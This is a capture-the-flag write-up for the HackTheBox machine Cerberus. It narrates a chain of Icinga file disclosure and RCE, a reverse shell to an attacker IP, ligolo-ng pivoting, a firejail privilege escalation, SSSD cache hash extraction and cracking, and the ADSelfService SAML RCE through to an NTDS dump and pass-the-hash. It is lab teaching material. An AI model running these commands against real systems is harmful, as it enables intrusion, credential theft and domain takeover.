CTF-Writeups/HackTheBox/Cerberus.md

HackTheBox - Cerberus

NMAP

Nmap scan report for 10.10.11.205
Host is up (0.093s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Did not follow redirect to http://icinga.cerberus.local:8080/icingaweb2
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.52 (Ubuntu)
| http-methods: 

Visiting the webserver on port 8080, it will redirect us to icinga.cerberus.local

Adding domain in /etc/hosts file

PORT 8080 (HTTP)

Trying Icinga default creds icingaadmin:icing but it failed

Looking for exploits realted to icinga2, there's Arbitrary File Disclosure (CVE-2022-24716) https://github.com/JacobEbben/CVE-2022-24716/blob/main/exploit.py

The webserver is hosted on ubuntu, we check from the server response

We can get the db credes for icingaweb2 which allowed us to login to icinga dashboard as `matthew`

We can use the CVE-2022-24715 for getting a reverse shell, before using that we need to generate pem file

https://github.com/JacobEbben/CVE-2022-24715

python3 ./RCE.py -t http://icinga.cerberus.local:8080/icingaweb2 -I 10.10.14.98 -P 2222 -u 'matthew' -p 'IcingaWebPassword2023' -e ./id_rsa

Checking the `/etc/hosts` file there's a host `DC.cerberus.local` on `172.16.22.1`

To pivot, we can use ligolo-ng for that we need to do a little setup for setting up the interface

sudo ip tuntap add user root mode tun ligolo
sudo ip link set ligolo up
sudo ip route add 172.16.22.0/24 dev ligolo

Then on attacking machine run proxy

./proxy -selfcert

And on target machine run the agent

agent -connect 10.10.14.98:11601 -ignore-cert -retry

After running agent, we'll get a connection on our machine

Scanning for common ports on dc it only showed port 5985 (WinRM) open on the machine

Running linpeas, it showed firejail showing as unknown SUID binary

Searching for firejail exploits there's a CVE for local privilege escalation CVE-2022-31214

https://gist.github.com/GugSaas/9fb3e59b3226e8073b3f8692859f8d25

With root user we have read access to /etc/krb5.keytab

But we can't really do anything with this account, from the linpeas we also see something about SSSD which is System Security Services Daemon that handles kerberos tickets on linux

Linux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the "ccache". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.[3] On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in /var/lib/sss/secrets/secrets.ldb as well as the corresponding key located in /var/lib/sss/secrets/.secrets.mkey. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for Pass the Ticket

But there wasn't any /var/lib/sss/secrets/.secrets.mkey file on the linux machine instead on researching where the AD cached credentials or hashes might be, I found a metasploit module which was explaning how it gathers the AD credentials on a linux machine

So here we have the cache file

We can transfer this on our machine and run tdbdump on it

``` tbdump ./cache_cerberus.local.ldb ```

Here we can find the hash for matthew user

$6$6LP9gyiXJCovapcy$0qmZTTjp9f2A0e7n4xk0L6ZoeKhhaCNm0VGJnX/Mu608QkliMpIy1FwKZlyUJAZU3FZ3.GQ.4N6bb9pxE3t3T0

Which gets cracked to 147258369

Having the DC's port 5985 accessible through ligolo-ng we can try authenticating with matthew user

evil-winrm -i 172.16.22.1  -u 'matthew' -p '147258369'

And we have gotten access to DC as matthew user, going into C:\Users directory, there's an ADFS service account so we might be dealing with SAML or something

Transferring and running sharphound.exe to enumerate the domain

Through evil-winrm we can use download to transfer the zip file on our machine

Uploading the json files to bloodhound-GUI

But from bloodhound I didn't see a path leading to anywhere, pivoting from the dc machine as only port 5985 was exposed so maybe there will be other services running on the dc

Now scanning the DC's IP

We can see port 8888 open, Accessing port 8888 it redirects to port 9521 and then redirects to dc.cerberus.local

This After logging in with matthew's creds it's going to redirect us to dc,

So adding dc in hosts file as well

this brings us ADSelfService Plus but we are not authorized to view anything here and ADSelfService is designed to help IT administrators enable end-users to reset forgotten passwords, unlock their accounts, and update their personal information in Active Directory (AD) without the need for IT assistance.

There's a CVE on ADSelfService for remote code execution (CVE 2022-47966)

https://github.com/horizon3ai/CVE-2022-47966

For the issuer URL, we can find about it from this article

https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-fed-saml-idp

In this scenario the issuer url is http://dc.cerberus.local/adfs/services/trust. now I tried running the python script but for some reason it didn't worked and I couldn't understand why this wasn't working

So instead using the metasploit module https://www.rapid7.com/db/modules/exploit/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966/

Now we can dump ntds by either transferring mimikatz or just creating a new administrator user and dumping the creds through seceretsdump (this is just an extra step, there's no need for doing this as you already have gotten a shell as SYSTEM user)

Having the administrator's hash we can perform pass the hash to get a shell as the administrator through winrm

References

• https://github.com/JacobEbben/CVE-2022-24716/blob/main/exploit.py
• https://github.com/Icinga/icingaweb2/security/advisories/GHSA-v9mv-h52f-7g63
• https://github.com/JacobEbben/CVE-2022-24715/blob/main/exploit.py
• https://gist.github.com/GugSaas/9fb3e59b3226e8073b3f8692859f8d25
• https://attack.mitre.org/techniques/T1558/
• https://support.robinpowered.com/hc/en-us/articles/215174126-Enabling-single-sign-on-via-ADFS
• https://github.com/horizon3ai/CVE-2022-47966
• https://www.rapid7.com/db/modules/exploit/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966/